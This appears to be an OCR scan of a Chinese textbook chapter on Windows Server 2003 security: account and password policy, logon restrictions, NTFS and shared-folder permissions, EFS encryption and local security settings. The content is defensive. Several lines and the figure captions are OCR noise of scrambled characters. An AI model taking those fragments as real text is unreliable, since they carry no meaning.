账号 创建 组 ,实施 安全 策略 ,管理 打印 机 以 及 分 配 用 户 对 资源 的 访问 权限 等 工作 。 

由 于 Administrator 账号 的 特殊 性 ,该 账号 深 受 黑 客 及 不 怀 好 意 的 用 户 的 青睐 ,成 为 攻 
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击 的 首选 对 象 。 出 于 安全 性 的 考虑 ,建议 将 该 账号 更 名 ,以 降低 该 账号 的 安全 风险 。 

(2) Guest 账号 。Guest( 来 宾 ) 账 号 一 般 被 用 于 在 域 中 或 计算 机 中 没有 固定 账号 的 用 
户 临 时 访问 域 或 计算 机 时 使 用 。 该 账号 默认 情况 下 不 允许 对 域 或 计算 机 中 的 设置 和 资源 做 
永久 性 的 更 改 。 出 于 安全 考虑 ,Guest 账号 在 Windows Server 2003 安装 好 之 后 是 被 屏蔽 
的 。 如 果 需 要 ,可 以 手动 启动 ,应 该 注意 分 配给 该 账号 的 权限 ,该 账号 也 是 黑客 攻击 的 主要 
对 象 。 


2. 账户 与 密码 约定 


在 规划 Windows Server 2003 域 时 ,有 两 种 约定 注意 考虑 : 账户 的 命名 约定 和 账户 的 密 
码 约 定 。 

1) 账户 命名 约定 

由 于 账号 在 域 中 的 重要 性 和 唯一 性 ,因此 账号 的 命名 约定 十 分 重要 。 一 个 好 的 账号 命 
名 约定 将 有 助 于 规划 一 个 高 效 的 活动 目录 。 

Windows 2003 的 账号 命名 约定 包括 如 下 内 容 : @ 域 用 户 账号 的 用 户 登 录 名 在 AD 中 
必须 唯一 ; @ 域 用 户 账号 的 完全 名 称 在 创建 该 用 户 账号 的 域 中 必须 唯一 ; 加 本 地 用 户 账号 
在 创建 该 账号 的 计算 机 中 必须 唯一 ; @ 如 果 用 户 名 称 有 重复 , 则 应 该 在 账号 上 区 别 出 来 ; 
加 对 于 临时 雇员 应 该 做 出 特殊 的 命名 ,以 便 标示 出 来 。 

用 户 账户 的 登录 名 最 多 可 以 包含 20 个 大 小 写字 符 和 数字 ,不 能 使 用 保留 字符 : / 八 、 
Dess tes x VEI. T BMC qe SEES EC ls EROR, 
并 且 更 易 使 用 。 

2) 账户 密码 约定 

密码 用 来 验证 账户 的 使 用 者 的 合法 性 ,因此 对 于 在 商业 环境 中 的 操作 系统 而 言 ,密码 的 
约定 是 十 分 重要 的 。 

通常 使 用 密码 有 如 下 原则 。Q@ 尽 量 避 免 带 有 明显 意义 的 字符 或 数字 的 组 合 ,最 好 采用 
大 小 写 和 数字 的 无 意义 混合 。 在 不 同安 全 要 求 下 ,规定 最 小 的 密码 长 度 。 通 常 密码 越 长 越 
不 易 被 猜 到 (最 长 可 以 达到 128 位 )。@ 对 于 不 同 级 别 的 安全 要 求 ,确定 用 户 的 账号 密码 是 
由 管理 员 控 制 还 是 由 账号 的 拥有 者 控制 。@@ 定 期 更 改 密码 ,尽量 使 用 不 同 的 密码 。 有 关 密 
码 的 策略 可 以 由 系统 管理 员 在 密码 策略 管理 工具 中 加 以 规定 ,以 保护 系统 的 安全 性 。 


3. 账户 和 密码 安全 设置 


为 了 控制 用 户 对 域 的 访问 ,加强 域 的 安全 性 ,可 以 设置 用 户 登 录 域 的 时 间 以 及 从 哪 台 工 
作 站 登录 到 域 中 等 ,这 些 选项 都 可 以 在 用 户 的 属性 中 加 以 确定 。 另 外 对 于 已 经 不 再 在 企业 
中 工作 的 员工 来 说 ,及 时 删除 或 屏蔽 该 员工 的 用 户 账号 是 很 重要 的 ,否则 将 是 一 个 安全 隐 
患 。 利 用 “账户 ”选项 卡 中 的 账户 过 期 可 以 帮助 管理 员 维 护 账号 的 使 用 期 限 。 

1) 限制 新 建 的 账号 的 登录 

例如 ,打开 要 设置 的 用 户 Guest 的 属性 对 话 框 。 

在 “账户 ”选项 卡 中 ,可 以 为 用 户 更 改 登录 名 ,如 图 5-1 所 示 。 

2) 限制 账户 的 登录 时 间 

在 如 图 5-1 所 示 的 “账户 ”选项 卡 中 , 单 击 “ 登 录 时 间 ” 按 钮 ,打开 用 户 的 登录 时 间 对 话 


第 5 章 ”操作 系统 安全 A 


框 ,在 该 对 话 框 中 可 以 设置 允许 或 拒绝 用 户 登录 到 域 的 时 间 。 蓝 色 的 格子 代表 允许 登录 的 


st 的 登录 时 间 
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图 5-1 “账户 ”选项 卡 图 5-2 用 户 的 登录 时 间 对 话 框 


单 击 要 设置 的 时 间 格 (一 格 代表 一 个 小 时 ) ,也 可 以 拖 动 鼠标 依次 选中 多 个 时 间 格 ,然后 
选择 “拒绝 登录 " 单 选 按钮 ,使 这 段 时 间 成 为 禁止 登录 的 时 间 段 ,白色 格子 代表 拒绝 登录 。 如 
果 用 户 在 域 中 工作 的 时 间 超 过 设 定 的 允许 登录 "时间, 并 不 会 断 开 与 域 的 连接 (登录 时 间 只 
是 限定 何 时 可 以 登录 到 域 中 ) 。 

3) 限制 登录 到 指定 的 计算 机 

在 如 图 5-1 所 示 的 “账户 "选项 卡 中 , 单 击 * 登 录 aas 
到 ”按钮 ,打开 “登录 工作 站 ”对 话 框 ,如 图 5-3 所 示 ， 
在 该 对 话 框 中 可 以 设置 允许 用 户 登 录 到 域 中 的 计 
算 机 ,默认 情况 下 用 户 可 以 从 任何 一 台 域 中 的 计算 
机 登录 到 域 。 

若 只 允许 登录 到 指定 的 计算 机 ,可 选择 * 下 列 
计算 机 ? 单 选 按钮 ,然后 在 “计算 机 名 ?文本 框 中 输 
和 人 允许 用 户 登 录 的 计算 机 名 , 单 击 “ 添 加 ”按钮 将 计 
算 机 加 入 到 计算 机 列表 中 。 如 果 要 删除 某 台 允许 
用 户 登 录 的 计算 机 ,只 需 在 列表 中 选中 相应 的 计算 
机 并 单 击 “ 删 除 ”按钮 即 可 。 在 “计算 机 名 ”文本 框 
中 只 能 输入 计算 机 的 NetBIOS 名 ,不 能 输入 DNS 5-3 “登录 工作 站 ”对 话 框 
名 或 全 地 址 。 

4) 设置 账号 失效 期 

在 如 图 5-1 所 示 的 “账户 ”选项 卡 中, “账户 过 期 "选项 组 可 以 为 该 帐户 设置 一 个 过 期 时 
间 。 默 认 情 况 下 账户 是 永久 有 效 的 ,除非 被 删除 。 如 果 企 业 中 有 临时 员工 并 且 希 望 临时 员 
工 离开 时 账户 自动 失效 , 则 可 以 选择 “在 这 之 后 * 单 选 按钮 ,然后 打开 下 拉 列 表 , 在 日 历 中 选 
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择 一 个 账户 的 失效 日 期 ,如 图 5-4 所 示 。 

这 个 功能 对 于 有 大 量 临时 员工 的 企业 来 讲 
是 十 分 有 效 的 。 当 账户 使 用 期 超过 设 定 的 日 期 ， 
则 使 用 该 帐户 将 不 能 登录 到 域 中 ,而 不 需要 管理 
员 手 动 删 除 账户 。 同 登录 时 间 一 样 , 该 账户 将 只 
拒绝 在 超过 设 定 日 期 之 后 的 登录 请 求 。 

5) 设置 密码 策略 

在 账户 策略 中 包含 “密码 策略 和"* 账 户 锁定 
策略 ”。 “密码 策略 "用 来 规定 这 台 计 算 机 的 用 户 
的 密码 设置 ,诸如 密码 最 小 长 度 、 密 码 复杂 性 要 
求 ,强制 密码 历史 等 。 通 过 这 些 设置 可 以 强制 用 
户 的 密码 使 用 习惯 。 “账户 锁定 策略 ”" 则 用 来 防 CE a | 
止 不 怀 好 意 的 人 使 用 穷 举 法 探测 本 机 的 密码 , 当 Ed wétdh 
多 次 输入 不 正确 的 密码 时 系统 会 自动 锁定 该 账 
户 ,并 维持 一 段 时 间 , 在 这 自 时 间 内 该 账户 处 于 不 可 使 用 的 状态 。 利 用 这 样 的 方式 可 以 有 效 
地 提高 计算 机 抵御 人 侵 的 能 力 。 

假设 要 求 用 户 使 用 的 密码 最 小 使 用 长 度 必须 为 12 位 , 则 在 “控制 面板 "窗口 中 双击 "管理 
工具 ”图标 ,在 打开 窗口 中 双击 “本 地 安全 设置 "图 标 ,在 “本 地 安全 设置 "窗口 中 的 右 侧 窗 格 中 
选择 “密码 策略 "选项 ,在 右 侧 的 子 窗口 中 会 出 现 该 策略 的 策略 列表 ,如 图 5-5 所 示 , 在 其 中 可 
以 设置 密码 长 度 最 小 值 。 双 击 "密码 长 度 最 小 值 "选项 ,打开 本 地 安全 策略 设置 对 话 框 ,如 
图 5-6 所 示 。 在 “安全 策略 设置 "选项 卡 中 设置 要 求 的 密码 长 度 ,然后 单 击 “ 确 定 "按钮, 结束 操作 


PEATE 


B55 密码 策略 列表 图 5-6 设置 密码 长 度 的 最 小 值 


5.2.2 Windows Server 2003 文件 系统 安全 


Windows Server 2003 使 用 NTFS 文 件 系 统 , 该 格式 是 基于 NTFS 分 区 实现 的 ,支持 用 
户 对 文件 的 访问 权限 ,也 支持 对 文件 和 文件 夹 的 加 密 , 因 而 具有 更 高 的 安全 性 。 


1. NTFS 权限 及 使 用 原则 


1) NTFS 权限 
Windows Server 2003 使 用 NTFS 文件 系统 格式 ,该 结构 提供 了 对 数据 文件 的 访问 控 
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制 机 制 。NTFS 权限 是 基于 NTFS 分 区 来 实现 的 ,NTFS 权限 可 以 实现 高 度 的 本 地 安全 性 。 
通过 对 用 户 赋予 NTFS 权限 可 以 有 效 地 控制 用 户 对 文件 和 文件 夹 的 访问 。 在 NTFS 分 
上 的 每 一 个 文件 和 文件 夹 都 有 一 个 列表 ,被 称 为 ACL(access control list, 访 问 控制 列表 )， 
该 列表 记录 了 每 个 用 户 和 组 对 该 资源 的 访问 权限 。 在 默认 情况 下 NTFS 权限 具有 继承 性 ， 
即 文件 和 文件 夹 继承 来 自 上 层 文件 夹 的 权限 (当然 也 可 以 禁止 下 层 文件 和 文件 夹 继承 来 自 
上 层 文件 夹 的 权限 分 配 ) 。 

NTFS 权限 分 为 特殊 NTFS 权限 和 标准 NTFS 权限 两 大 类 。 标 准 NTFS 权限 可 以 说 
是 有 特殊 NTFS 权限 的 特定 组 合 。 特 殊 NTFS 权限 包含 了 在 各 种 情况 下 对 资源 的 访问 权 
限 ,其 规定 约束 了 用 户 访问 资源 的 所 有 行为 。 但 通常 情况 下 用 户 的 访问 行为 都 是 几 个 特定 
的 特殊 NTFS 权限 的 组 合 或 集合 。Windows Server 2003 为 了 简化 管理 ,将 一 些 常用 的 特 
殊 NTFS 权限 组 合 起 来 直到 操作 系统 中 形成 了 标准 NTFS 权限 , 当 需 要 分 配 权限 时 可 以 通 
过 分 配 一 个 标准 NTFS 权限 而 达到 一 次 分 配 多 个 特殊 NTFS 权限 的 目的 。 这 样 做 大 大 简 
化 了 权限 分 配 和 管理 。 如 果 需 要 特殊 的 NTFS 权限 组 成 的 集合 ,但 没有 标准 的 NTFS 权限 
提供 时 ,可 以 通过 特殊 NTFS 权限 组 合 以 满足 要 求 。 

其 中 “更 改 权限 ?权限 可 以 授权 给 用 户 ,使 得 用 户 对 资源 没有 访问 的 权限 ,但 可 以 为 该 资 
源 分 配 权 限 。 一 般 情况 下 将 该 权限 授予 Administrators 组 ,以 便 管 理 员 可 以 控制 资源 的 访 
问 权 。 

“取得 所 有 权 ” 权 限 可 以 让 用 户 获 得 某 个 资源 的 所 有 权 , 一 般 情况 下 文件 或 文件 夹 
的 创建 者 自动 获得 “取得 所 有 权 ” 权 限 。 为 了 获得 文件 或 文件 夹 的 所 有 权 ,操作 者 必须 
对 该 资源 拥有 “完全 控制 "的 权限 或 取得 所 有 权 ” 这 一 特殊 NTFS 权限 。Administrators 
组 的 成 员 总 是 可 以 获得 对 任何 资源 的 所 有 权 , 而 不 管 该 组 的 成 员 是 否 被 赋予 其 他 任何 
权限 。 

2) NTFS 权限 的 使 用 原则 

一 个 用 户 可 能 属于 多 个 组 ,而 这 些 组 又 有 可 能 被 针对 某 种 资源 赋予 了 不 同 的 权限 ,另外 
用 户 或 组 可 能 会 对 某 个 文件 夹 和 该 文件 夹 下 的 文件 有 不 同 的 访问 权限 。 在 这 种 情况 下 就 必 
须 通 过 NTFS 权限 法 则 来 判断 到 底 用 户 对 资源 有 何 种 访问 权限 。 

NTFS 权限 的 使 用 原则 如 下 。 

CD 权限 最 大 原则 。 当 一 个 用 户 同时 属于 多 个 组 ,而 这 些 组 又 有 可 能 被 针对 某 种 资 
源 赋予 了 不 同 的 访问 权限 , 则 用 户 对 该 资源 最 终 有 效 权限 是 在 这 些 组 中 最 宽松 的 权限 ， 
即 加 权限 ,将 所 有 的 权限 加 在 一 起 即 为 该 用 户 的 权限 (“完全 控制 "权限 为 所 有 权限 的 
总 和 )。 

(2) 文件 权限 超越 文件 夹 权 限 原则 。 当 用 户 或 组 对 某 个 文件 夹 以 及 该 文件 夹 下 的 文件 
有 不 同 的 访问 权限 时 ,用 户 对 文件 的 最 终 权 限 是 用 户 被 赋予 访问 该 文件 的 权限 , 即 文件 权限 
超越 文件 的 上 级 文件 夹 的 权限 ,用 户 访问 该 文件 夹 下 的 文件 不 受 文件 夹 权限 的 限制 ,而 只 受 
被 赋予 的 文件 权限 的 限制 。 

(3) 拒绝 权限 超越 其 他 权限 原则 。 当 用 户 对 某 个 资源 有 拒绝 权限 时 ,该 权限 覆盖 其 他 
任何 权限 , 即 在 访问 该 资源 的 时 候 只 有 拒绝 权限 是 有 效 的 。 当 有 拒绝 权限 时 权限 最 大 法 则 
无 效 。 因 此 对 于 拒绝 权限 的 授予 应 该 慎重 考虑 。 

在 Windows Server 2003 没有 一 种 权限 叫做 “拒绝 ”权限 ,实际 上 在 Windows Server 


54 


151 


MV 


152 


Ad 


网 络 安全 技术 


2003 中 的 每 一 种 权限 都 有 两 个 状态 一 一 允许 和 
拒绝 ,如 图 5-7 所 示 。 ——L | 

对 “完全 控制 ”权限 加 以 拒绝 意味 着 拒绝 一 切 
访问 。 该 设置 是 NTFS 权限 中 最 严格 的 ,将 超越 
一 切 权限 。 如 果 用 户 针 对 某 种 资源 被 授予 了 “ 拒 
绝 ” 权 限 则 不 能 访问 该 资源 ,系统 将 拒绝 其 对 该 资 ET 
源 的 任何 操作 ,即使 是 管理 员 也 一 样 (但 是 管理 员 修改 
可 以 有 其 他 的 方法 来 访问 该 资源 ) 。 

当 一 个 分 区 被 格式 化 为 NTFS 分 区 之 后 ， 

Windows Server 2003 系统 会 自动 将 EVERYONE Ege 

Kv ftéSx BAURBORTROEIRIR EAR Q0 
组 赋予 对 该 分 区 的 根 文 件 夹 “完全 控制 ?的 权限 。 
EVERYONE 组 是 Windows Server 2003 中 的 一 
个 内 置 的 系统 组 ,该 组 的 含义 为 所 有 访问 资源 的 。 图 5 7 每 一 种 权限 都 有 允许 和 拒绝 
用 户 自动 成 为 EVERYONE 组 的 成 员 , 即 任何 访 网 种 状态 
问 该 计算 机 的 用 户 都 会 成 为 该 计算 机 的 EVERYONE 组 的 成 员 , 不 管用 户 是 否 属于 某 
个 组 。 
假如 用 户 STREAM 同时 属于 NETWORKCENTER,GROUPA,GROUPB 三 个 组 ,对 
于 资源 “课件 建设 ”文件 夹 分 别 具 有 如 表 5-1 所 示 的 权限 。 

在 这 个 例子 中 用 户 STREAM 对 “课件 建设 "文件 夹 的 最 终 权 限 为 “完全 控制 ”。 因 为 
“完全 控制 "是 这 些 权限 中 最 宽松 的 权限 。 假 设 在 本 例 中 GROUPB 组 对 “课件 建设 "文件 
夹 的 权限 为 “拒绝 ”权限 , 则 用 户 STREAM 对 “课件 建设 ”文件 夹 的 访问 将 是 被 拒绝 的 , 因 
为 “拒绝 ”权限 覆盖 一 切 权限 ,即使 用 户 本 身 对 “课件 建设 "文件 夹 被 赋予 了 “完全 控制 "的 
权限 。 

还 是 基于 表 5-1 ,如 果 用 户 对 “课件 建设 ”文件 夹 下 的 一 个 文件 File. doc 被 赋予 “ 读 取 ” 
的 权限 , 则 最 终 用 户 到 底 对 该 文件 是 什么 样 的 权限 ?综合 考虑 所 有 的 权限 原则 ,在 文件 夹 一 
级 用 户 的 最 终 权限 为 “完全 控制 ,而 对 于 该 文件 夹 下 的 文件 File. doc 的 权限 为 “ 读 取 ”, 根 
据 “ 文 件 权 限 超越 文件 夹 权限 ”原则 ,因此 用 户 对 该 文件 的 最 终 权 限 为 “ 读 取 ” 而 非 “ 完 全 
控制 ”。 
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组 或 用 户 权 m 组 或 用 户 权 m 
STREAM 完全 控制 GROUPA 5A 
NETWORKCENTER 读 取 GROUPB 列 出 文件 夹 目录 


授予 用 户 NTFS 权限 的 操作 如 下 。 

CD 打开 Windows 资源 管理 器 ,在 硬盘 上 找到 要 设置 权限 的 文件 或 文件 夹 (本 例 以 “ 课 
件 建设 "文件 夹 为 例 ) 。 

D 在 该 文件 夹 上 右 击 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ,打开 “课件 建设 属性 ” 
对 话 框 ,如 图 5-8 所 示 。 

(3) 选择 “安全 ”选项 卡 ,如 图 5-9 所 示 。 在 该 对 话 框 中 可 以 看 到 Everyone 组 对 “课件 建 
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设 " 文 件 夹 有 "完全 控制 "的 权限 。 这 是 因为 如 前 所 述 系 统 会 自动 为 Everyone 组 对 分 区 的 根 
文件 夹 赋予 完全 控制 的 权限 ,而 这 个 权限 会 向 下 继承 ,因此 Everyone 组 对 该 分 区 下 的 所 有 
文件 和 文件 夹 都 被 赋予 完全 控制 的 权限 。 


图 5-8 “课件 建设 属性 ?对 话 框 图 5-9 “安全 ”选项 卡 


CD 单 击 “ 添 加 ”按钮 ,打开 “选择 用 户 或 组 ”对 话 框 。 在 上 半 部 的 用 户 和 组 列表 中 选中 
要 赋予 权限 的 用 户 或 组 , 单 击 * 添 加 ?按钮 将 选 定 的 用 户 或 组 添加 到 下 半 部 的 列表 中 (本 
例 中 是 选择 g 册 用 户 ) ,如 图 5-10 所 示 。 选 定 后 , 单 击 “确定 ”按钮 返回 “课件 建设 属性 ?对 
话 框 。 


选择 用 户 或 组 


图 510 “选择 用 户 或 组 "对话 框 (1) 


O 在 “安全 ”选项 卡 中 看 到 的 权限 都 是 NTFS 标准 权限 。 如 果 想 赋予 用 户 NTFS 特殊 
权限 可 以 单 击 “ 高 级 "按钮 ,打开 “课件 建设 的 访问 控制 设置 "对话 框 ,如 图 5-11 所 示 。 

(6) 在 “权限 项 目 ” 列 表 框 中 单 击 要 赋予 特殊 NTFS 权限 的 用 户 ,再 单 击 “查看 /编辑 " 按 
钮 打开 “课件 建设 的 权限 项 目 ” 对 话 框 ,如 图 5-12 所 示 。 
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课件 建设 的 权限 项 目 


课件 建设 的 访问 控制 设置 
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图 5-11 “课件 建设 的 访问 控制 设置 "对 话 框 (1) 图 5-12 “课件 建设 的 权限 项 目 ” 对 话 框 


CD 选中 “课件 建设 的 访问 控制 设置 ”对话 框 底部 的 “允许 将 来 自 父 系 的 可 继承 权限 传 
播 给 该 对 象 " 复 选 框 意味 着 这 个 文件 夹 可 以 继承 来 自 其 上 一 级 文件 夹 的 权限 设置 ; 选中 “ 重 
置 所 有 子 对 象 的 权限 并 允许 传播 可 继承 权限 " 复 选 框 意味 着 将 该 文件 夹 下 的 所 有 子 文件 夹 
和 文件 的 权限 取消 ,并 重新 设置 成 与 其 父 文件 夹 一 致 的 权限 ( 即 强制 用 父 文件 夹 的 权限 替换 
子 文件 夹 和 文件 的 权限 ) ,如 图 5-13 所 示 。 


课件 建设 的 访问 控制 设置 


| 


图 5-13 “课件 建设 的 访问 控制 设置 ?对话 框 (2) 


(8) 在 图 5-12 中 的 “权限 列表 框 中 选择 是 否 赋予 某 项 权限 。 
2. NTFS 权限 的 继承 


在 同一 个 NTFS 分 区 内 或 不 同 的 NTFS 分 区 之 间 移 动 或 复制 一 个 文件 或 文件 夹 时 ,该 
文件 或 文件 夹 的 NTFS 权限 会 发 生 不 同 的 变化 。 
D 在 同一 个 NTFS 分 区 内 移动 文件 或 文件 夹 。 在 同一 分 区 内 移动 的 实质 就 是 在 目的 
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位 置 将 原 位 置 上 的 文件 或 文件 夹 “ 搬 ”过 来 ,因此 文件 和 文件 夹 仍然 保留 有 在 原 位 置 的 一 切 
NTFS 权限 (准确 地 讲 就 是 该 文件 或 文件 夹 的 权限 不 变 ) 。 

(2) 在 不 同 NTFS 分 区 之 间 移动 文件 或 文件 夹 。 在 这 种 情况 下 文件 和 文件 夹 会 继承 目 
的 分 区 中 文件 夹 的 权限 (ACL) ,实质 就 是 在 原 位 置 删 除 该 文件 或 文件 来, 并且 在 目的 位 置 
新 建 该 文件 或 文件 夹 ( 要 从 NTFS 分 区 中 移动 文件 或 文件 夹 , 操 作者 必须 具有 相应 的 权限 。 
在 原 位 置 上 必须 有 ”修改 ”的 权限 ,在 目的 位 置 上 必须 有 * 写 权限) 。 

(3) 在 同一 个 NTFS 分 区 内 复制 文件 或 文件 夹 。 在 这 种 情况 下 复制 文件 和 文件 夹 将 继 
承 目的 位 置 中 的 文件 夹 的 权限 。 

(4) 在 不 同 NTFS 分 区 之 间 复 制 文件 或 文件 夹 。 在 这 种 情况 下 复制 文件 和 文件 夹 将 继 
承 目的 位 置 中 文件 夹 的 权限 ( 当 从 NTFS 分 区 向 FAT 分 区 中 复制 或 移动 文件 和 文件 夹 都 
将 导致 文件 和 文件 夹 的 权限 丢失 ,因为 FAT 分 区 不 支持 NTFS 权限 ) 。 


3. 共享 文件 夹 权限 管理 


共享 文件 夹 (share folder) 是 被 用 来 向 网 络 用 户 提供 对 文件 资源 的 访问 ,可 以 包括 应 用 
程序 公用 数据 或 用 户 个 人 数据 。 当 一 个 文件 夹 被 共享 的 时 候 ,用 户 可 通过 网 络 连 接 到 该 文 
件 夹 并 访问 其 中 包含 的 文件 。 但 用 户 需 要 拥有 访问 共享 文件 夹 的 权限 。 

1) 共享 文件 夹 的 权限 

共享 文件 夹 的 权限 如 下 。@ 读 权限 : 用 户 可 以 显示 文件 夹 名 称 、 文 件 名 ,文件 属性 ; 可 
以 运行 程序 文件 ; 可 以 对 共享 文件 夹 内 的 文件 夹 作出 改动 。@ 修 改 权 限 : 用 户 可 以 创建 文 
Te .向 文件 夹 中 添加 文件 .改变 文件 中 的 数据 ` 向 文件 中 添加 数据 ,改变 文件 属性 、 删 除 文 
件 夹 和 文件 ,并 能 执行 读 权 限 允 许 的 操作 。@ 完 全 控制 权限 : 用 户 可 以 改变 文件 权限 .获取 
文件 的 所 有 权 , 并 执行 修改 权限 允许 的 所 有 任务 。 

2) 共享 文件 夹 权 限 的 特点 

共享 文件 夹 权限 的 特点 为 : 共享 文件 夹 权 限 用 于 文件 夹 而 不 是 单独 的 文件 ; 共享 文件 
夹 权限 只 能 用 于 整个 共享 文件 夹 ,不 能 用 于 共享 文件 夹 的 单个 文件 或 子 文件 夹 。 

共享 文件 夹 权限 只 适用 于 通过 网 络 连接 文件 夹 的 用 户 , 对 存储 共享 文件 夹 的 计算 机 上 
的 用 户 访问 则 不 受 限制 。 默 认 的 共享 文件 夹 权 限 是 完全 控制 ,被 设置 到 Everyone HE. 


4. 文件 的 加 密 与 解密 


在 Windows Server 2003 的 NTFS 文件 系统 中 内 置 了 EFS 加 密 系统 ,利用 EFS 加 密 系 
统 可 以 对 保存 在 硬盘 上 的 文件 进行 加 密 , 其 加 密 和 解密 过 程 对 应 用 程序 和 用 户 而 言 是 完全 
透明 的 。 文 件 或 文件 夹 被 加 密 后 ,未 经 许可 加 密 文件 或 文件 夹 进行 物理 访问 的 人 侵 者 无 法 
阅读 这 些 文件 或 文件 夹 中 的 内 容 。 通 常 将 要 加 密 的 文件 置 于 一 个 文件 夹 中 ,再 对 该 文件 夹 
加 密 ,可 以 一 次 加 密 大 量 的 文件 。 在 该 文件 夹 下 创建 的 所 有 文件 和 子 文件 夹 都 会 被 加 密 。 

1) 加 密 文件 和 子 文件 夹 

具体 操作 过 程 如 下 。 

(D 在 Windows 资源 管理 器 中 ,选择 要 加 密 的 文件 或 文件 夹 ,本 例 为 howood 。 

(2) 在 选择 的 文件 或 文件 夹 上 右 击 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ,打开 文件 或 
文件 夹 属性 对 话 框 。 
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(3) 单 击 “ 高 级 "按钮 ,弹出 “高 级 属性 ”对 话 框 ; 选中 “加 密 内 容 以 便 保护 数据 ” 复 选 框 ， 
如 图 5-14 所 示 , 单 击 “ 确 定 ” 按 钮 。 

(4) 在 “howood 属性 ”对 话 框 中 单 击 “ 应 用 ”按钮 ,弹出 “确认 属性 更 改 ” 对 话 框 。 选 择 “ 仅 
将 更 改 应 用 于 该 文件 夹 " 单 选 按钮 , 则 将 只 加 密 选 择 的 文件 夹 以 及 之 后 添加 到 这 一 文件 夹 下 的 
任何 文件 和 文件 夹 中 的 数据 (图 5-15); 选择 “将 更 改 应 用 于 该 文件 夹子 文件 夹 和 文件 ” 单 选 
按钮 ,将 加 密 所 有 已 经 加 入 和 之 后 加 入 到 这 个 文件 夹 下 的 文件 和 文件 夹 及 子 文件 夹 下 的 数据 。 

O 单 击 “ 确 定 ” 按 钮 ,结束 操作 。 


高 级 必 性 PR 
(à+ WORBFET 该 文件 灵 的 设置 。 
DE n 
人 已 和 过 反对 属性 进行 山下 更 2 
sifRHES ITER: 
OTUFEXERO D] 
[99 (ERE » EUER UR SR IRE PEREROSES| CD) RERENEBTTHA, ERERIERTERTIMXGURNO 
Tennem 
CIEsSASU m Sd gES O SPERTS 
DE ET C WESSRTEXHA FRNY 
ELM 
图 5-14 “高 级 属性 ”对 话 框 图 5-15 设置 加 密 属性 


2) 解密 文件 和 文件 夹 

当 一 个 用 户 对 一 个 文件 或 文件 夹 加 密 时 ,EFS 会 为 用 户 产生 一 个 公 钥 和 私 钥 对 。 利 用 
其 中 的 私 钥 可 以 对 文件 解密 。 该 私 钥 对 应 唯一 的 用 户 , 即 该 私 钥 只 属于 进行 加 密 操作 的 用 
户 , 其 他 用 户 的 私 钥 是 无 法 解密 该 文件 的 。 
即使 其 他 用 户 改变 了 文件 的 权限 或 属性 ,或 得 到 了 文件 的 所 有 权 也 仍然 无 法 将 数据 解 
密 。 因 此 加 密 文件 不 能 被 共享 使 用 。 若 由 于 某 些 原因 对 文件 加 密 的 用 户 不 存在 了 ,将 导致 
文件 无 法 解密 。EFS 使 用 经 过 加 密 的 数据 恢复 代理 (encrypted data recovery agent) 来 解密 
数据 。 经 过 加 密 的 数据 恢复 代理 功能 可 以 整合 到 域 的 组 策略 中 ,因此 可 以 针对 整个 域 来 设 
置 数据 恢复 代理 。 


5.2.3 Windows Server 2003 主机 安全 


Windows Server 2003 主机 安全 是 针对 单个 主机 设置 的 安全 规则 ,用 来 保护 计算 机 上 
的 重要 数据 。 

Windows Server 2003 安全 策略 定义 了 用 户 在 使 用 计算 机 、 运 行 应 用 程序 和 访问 网 络 
等 方面 的 行为 ,通过 这 些 约束 避免 了 各 种 对 网 络 安全 的 有 意 或 无 意 的 伤害 。 安 全 策略 是 一 
个 事先 定义 好 的 一 系列 应 用 于 计算 机 的 行为 准则 ,应 用 这 些 安全 策略 将 使 用 户 有 一 致 的 工 
作 方 式 , 防 止 用 户 破 坏 计算 机 上 的 各 种 重要 配置 ,保护 网 络 上 的 敏感 数据 。 

在 Windows Server 2003 中 安全 策略 是 以 本 地 安全 设置 和 组 策略 两 种 形式 出 现 的 。 本 
地 安全 设置 是 基于 单个 计算 机 的 安全 性 而 设置 的 。 对 于 较 小 的 组 织 ,或 者 在 网 络 中 没有 应 
用 活动 目录 的 网 络 ( 基 于 工作 组 模式 ) ,适用 于 本 地 安全 设置 。 而 组 策略 可 以 在 站 点 ,组 织 单 
元 或 域 的 范围 内 实现 ,通常 在 较 大 规模 并 且 实 施 活动 目录 的 网 络 中 应 用 组 策略 。 
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1. 实施 本 地 安全 设置 


本 地 安全 设置 只 能 在 不 属于 某 个 域 的 计算 机 上 实现 ,其 中 可 设 定 的 值 较 少 ,对 用 户 的 约 
束 也 较 少 。 如 果 要 在 整个 网 络 中 约束 用 户 使 用 计算 机 的 行为 , 则 必须 在 每 一 个 计算 机 上 实 
施 本 地 安全 设置 。 本 地 安全 设置 包括 账户 策略 ,本 地 策略 , 公 钥 策略 和 IP 安全 策略 。 

1) 账户 策略 

账户 策略 包含 密码 策略 和 账户 策略 。 密 码 策 略 用 来 规范 使 用 这 台 计 算 机 的 用 户 的 密码 
设置 ,如 密码 最 小 长 度 、 密 码 复杂 性 要 求 、 强 制 密码 历史 等 ,通过 这 些 设置 可 以 强制 用 户 的 密 
码 使 用 习惯 ,如 图 5-16 所 示 。 


P 本 地 安全 设置 
XH) 操作) EV D 


IE 
ETRZULLIEKTT II 


密码 历史 0 个 记 住 的 密码 
C 软件 限制 策略 p E 
crees E RHEN 项 为 城中 所 有 用 户 使 用 可 还 原 的 加 密 末 鱼 存 窜 码 已 停 用 


图 5-16 密码 策略 设置 
账户 策略 用 来 防止 恶意 攻击 , 当 多 次 输入 不 正确 的 密码 时 系统 会 自动 锁定 该 账户 ,如 
图 5-17 所 示 。 


E 本 地 安全 设置 
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图 5-17 账户 策略 设置 


2) 本 地 策略 
本 地 策略 中 包含 “审核 策略 ”“ 用 户 权力 指派 "和 “安全 选项 ”三 项 内 容 。 
“审核 策略 ”中 包含 了 对 系统 行为 的 审核 设置 ,确定 哪些 系统 事件 要 求 审核 而 哪些 不 


157 


A 


158, ”网 络 安全 技术 
Nx 
审核 发 生 的 事件 按照 预先 设 定 的 方式 记录 下 来 以 供 检查 和 分 析 , 至 于 审核 的 事件 是 哪些 ,由 
shi 5-18 所 示 。 
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[E 全 安全 策略, 在 本 地 计算 机 


图 5-18 审核 策略 设置 
“用 户 权力 指派 "可 以 将 很 多 重要 的 系统 工作 (备份 文件 和 目录 、 关 闭 系统 ) 的 执行 权力 
交 给 某 些 用 户 。 管 理 员 可 以 确定 哪些 用 户 或 组 可 以 具备 哪些 权力 ,如 图 5-19 所 示 。 
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“安全 选项 "中 包含 了 很 多 用 于 加 强 系统 访问 控制 安全 性 的 设置 ,如 图 5-20 所 示 。 
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图 5-20 安全 选项 设置 
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3) 公 钥 策略 

